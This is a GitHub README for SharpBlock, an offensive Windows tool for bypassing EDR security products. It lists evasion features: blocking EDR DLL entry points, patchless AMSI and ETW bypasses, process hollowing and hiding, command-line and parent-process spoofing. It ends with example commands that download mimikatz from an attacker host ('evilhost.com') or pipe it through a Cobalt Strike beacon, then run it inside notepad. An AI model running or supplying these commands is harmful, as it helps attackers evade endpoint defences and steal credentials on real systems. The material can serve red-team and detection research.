A method of bypassing EDRs' active protection DLLs by preventing entry point execution
CCob/SharpBlock

Latest commit c7f6fcb · Mar 31, 2021
SharpBlock

A method of bypassing EDRs' active protection DLLs by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or a named pipe (Cobalt Strike).
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation, using a stealthy method to avoid EDR detection.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when the callee is within the address range of a blocked DLL.

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note: for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager first.

Accompanying Blog Posts:
